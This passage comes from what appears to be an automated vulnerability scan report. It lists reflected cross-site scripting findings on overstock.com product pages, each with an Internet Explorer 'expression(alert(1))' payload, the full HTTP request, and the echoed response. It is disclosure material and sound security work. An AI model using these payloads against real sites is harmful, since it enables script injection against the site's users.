Path:   /Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86e7"style%3d"x%3aexpression(alert(1))"459158a778c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c86e7"style="x:expression(alert(1))"459158a778c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html?c86e7"style%3d"x%3aexpression(alert(1))"459158a778c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:53:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:53:01 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:01 GMT; Path=/
Set-Cookie: mxcproclicks=4034996|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404381352:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ad
...[SNIP]...
<input type="hidden" name="c86e7"style="x:expression(alert(1))"459158a778c" value="1"/>
...[SNIP]...

2.7. http://www.overstock.com/Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a597d"style%3d"x%3aexpression(alert(1))"e7efc54d74e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a597d"style="x:expression(alert(1))"e7efc54d74e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html?a597d"style%3d"x%3aexpression(alert(1))"e7efc54d74e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:00 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408280748:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:00 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2691136|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:00 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 126217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Ad
...[SNIP]...
<input type="hidden" name="a597d"style="x:expression(alert(1))"e7efc54d74e" value="1"/>
...[SNIP]...

2.8. http://www.overstock.com/Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be1a"style%3d"x%3aexpression(alert(1))"d9cf0caab8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1be1a"style="x:expression(alert(1))"d9cf0caab8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html?1be1a"style%3d"x%3aexpression(alert(1))"d9cf0caab8a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:36 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:36 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:36 GMT; Path=/
Set-Cookie: mxcproclicks=5016847|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:36 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404776530:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102314

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="1be1a"style="x:expression(alert(1))"d9cf0caab8a" value="1"/>
...[SNIP]...

2.9. http://www.overstock.com/Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e4d"style%3d"x%3aexpression(alert(1))"85f611973fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2e4d"style="x:expression(alert(1))"85f611973fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html?d2e4d"style%3d"x%3aexpression(alert(1))"85f611973fd=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:21 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5301336|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:21 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404941652:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:21 GMT; Path=/
Keep-Alive: timeout=5, max=31
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108872

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="d2e4d"style="x:expression(alert(1))"85f611973fd" value="1"/>
...[SNIP]...

2.10. http://www.overstock.com/Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688e1"style%3d"x%3aexpression(alert(1))"782a1c744b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688e1"style="x:expression(alert(1))"782a1c744b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html?688e1"style%3d"x%3aexpression(alert(1))"782a1c744b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:18 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408178718:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcproclicks=29943|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="688e1"style="x:expression(alert(1))"782a1c744b" value="1"/>
...[SNIP]...

2.11. http://www.overstock.com/Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2260e"style%3d"x%3aexpression(alert(1))"96ee5398979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2260e"style="x:expression(alert(1))"96ee5398979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html?2260e"style%3d"x%3aexpression(alert(1))"96ee5398979=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:35 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:35 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=512067|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:35 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408195880:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:35 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=31
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="2260e"style="x:expression(alert(1))"96ee5398979" value="1"/>
...[SNIP]...

2.12. http://www.overstock.com/Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7efa"style%3d"x%3aexpression(alert(1))"dd0f4e2dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7efa"style="x:expression(alert(1))"dd0f4e2dd35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html?b7efa"style%3d"x%3aexpression(alert(1))"dd0f4e2dd35=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:19 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408179650:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3025022|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="b7efa"style="x:expression(alert(1))"dd0f4e2dd35" value="1"/>
...[SNIP]...

2.13. http://www.overstock.com/Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c8b"style%3d"x%3aexpression(alert(1))"366dab40ca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18c8b"style="x:expression(alert(1))"366dab40ca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html?18c8b"style%3d"x%3aexpression(alert(1))"366dab40ca2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
